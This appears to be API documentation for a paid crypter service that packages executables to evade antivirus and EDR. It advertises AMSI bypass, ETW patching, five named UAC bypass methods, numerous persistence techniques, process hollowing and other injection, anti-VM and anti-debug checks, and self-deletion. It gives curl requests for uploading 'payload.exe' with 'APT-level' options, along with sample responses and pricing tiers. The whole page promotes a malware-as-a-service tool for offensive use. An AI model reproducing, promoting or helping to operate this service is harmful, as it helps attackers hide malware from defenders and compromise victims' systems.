Advanced Threat Protection System
Integrate Namz Crypter directly into your workflow with our powerful REST API.
API access is available for Professional (50 req/day), Elite (200 req/day), and Lifetime (unlimited) plan members. Starter plan does not include API access.
Unlock the most advanced evasion capabilities with Elite or Lifetime plans. These features are designed for APT-level operations.
Bypass Windows Defender AMSI scanning with runtime patching. Undetected by real-time protection.
Disable Event Tracing for Windows to evade EDR behavioral detection and logging.
5 silent UAC bypass methods with auto-fallback: FodHelper, ComputerDefaults, EventVwr, SDCLT, SilentCleanup.
Registry, Tasks, Services, WMI, DLL Hijack, COM Hijack, LSA, Netsh, Print Monitor, and more.
DLL Injection, Process Hollowing, APC, CLR Injection, Assembly.Load, Profiling API.
Every build generates unique code with different signatures, hashes, and structure.
Crypt an executable file with the specified options. Returns a job ID and download URL for the crypted file.
Authorization: Bearer YOUR_API_KEY Content-Type: multipart/form-data
| Name | Type | Description |
|---|---|---|
| filerequired | file | The executable file to crypt (.exe only) |
| type | string | Payload type: "auto", "native", "dotnet" (default: auto) |
| injection | string | Injection method: "dll_injection", "process_hollowing", "apc_injection", "clr_injection", "assembly_load", "profiling_api" (Elite+) |
| anti_vm | boolean | Enable virtual machine detection ("true" or "false") |
| anti_debug | boolean | Enable anti-debugging protection ("true" or "false") |
| amsi_bypass | boolean | Enable AMSI bypass (Elite+) |
| etw_patch | boolean | Enable ETW patching (Elite+) |
| uac_bypass | boolean | Enable UAC bypass with 5 fallback methods (Elite+) |
| persistence | string | Persistence method: "registry_run", "scheduled_task", "startup_folder", "service", "wmi_event", "dll_hijack", "com_hijack", "appinit_dll", "image_file_exec", "winlogon", "lsa", "netsh_helper", "print_monitor", "security_provider", "office_addin", "powershell_profile", "screensaver", "bitsadmin" (Elite+) |
| delay | integer | Execution delay in seconds (0-360) |
| melt | boolean | Self-delete after execution ("true" or "false") |
| hide_window | boolean | Hide console window (default: "true") |
# Basic crypt request curl -X POST https://namzcrypter.net/api/v1/crypt \ -H "Authorization: Bearer YOUR_API_KEY" \ -F "file=@payload.exe" \ -F "type=auto" \ -F "injection=process_hollowing" \ -F "anti_vm=true" \ -F "anti_debug=true" \ -F "delay=5"
# APT-Level crypt with all Elite features curl -X POST https://namzcrypter.net/api/v1/crypt \ -H "Authorization: Bearer YOUR_API_KEY" \ -F "file=@payload.exe" \ -F "type=dotnet" \ -F "injection=clr_injection" \ -F "anti_vm=true" \ -F "anti_debug=true" \ -F "amsi_bypass=true" \ -F "etw_patch=true" \ -F "uac_bypass=true" \ -F "persistence=scheduled_task" \ -F "delay=30"
{
"success": true,
"data": {
"id": "crypt_abc123xyz...",
"download_url": "/api/v1/download/abc123xyz...",
"expires_at": "2025-12-03T12:00:00Z",
"file_size": 1048576,
"hash": "sha256:...",
"payload_type": "dotnet",
"features": {
"amsi_bypass": true,
"etw_patch": true,
"uac_bypass": true,
"persistence": "scheduled_task"
}
}
}Download a crypted file by job ID. Returns the file as an attachment. Links expire after 24 hours.
Authorization: Bearer YOUR_API_KEYReturns the crypted executable file as a binary download.
Check the status of a crypt job. The job_id can include or exclude the "crypt_" prefix.
{
"success": true,
"data": {
"id": "crypt_abc123xyz...",
"status": "completed",
"progress": 100,
"created_at": "2025-12-02T10:30:00Z",
"error": null
}
}Get information about your account, including subscription status and usage statistics.
{
"success": true,
"data": {
"username": "your_username",
"plan": "elite",
"builds_today": 12,
"builds_limit": "unlimited",
"api_calls_today": 34,
"api_calls_limit": 200,
"expires_at": "2026-01-15T00:00:00Z"
}
}Note: Lifetime plans show "unlimited" for builds_limit and api_calls_limit. Plans: starter, professional, elite, lifetime.
Delete a crypted file from our servers. Files are automatically deleted after 24 hours. The job_id can include or exclude the "crypt_" prefix.
{
"success": true,
"message": "File deleted successfully"
}All API endpoints return consistent error responses with appropriate HTTP status codes.
| Code | Message | Description |
|---|---|---|
| 401 | Missing API key | No Authorization header provided |
| 401 | Invalid API key | API key not found or inactive |
| 401 | API access requires Professional or Lifetime plan | User doesn't have API access |
| 401 | Rate limit exceeded | 50 requests/day limit reached (Professional) |
| 400 | Invalid PE file | File is not a valid Windows executable |
| 404 | Job not found | Crypt job doesn't exist or doesn't belong to user |
| 410 | Download link expired | File expired after 24 hours |
{
"success": false,
"message": "Error description here"
}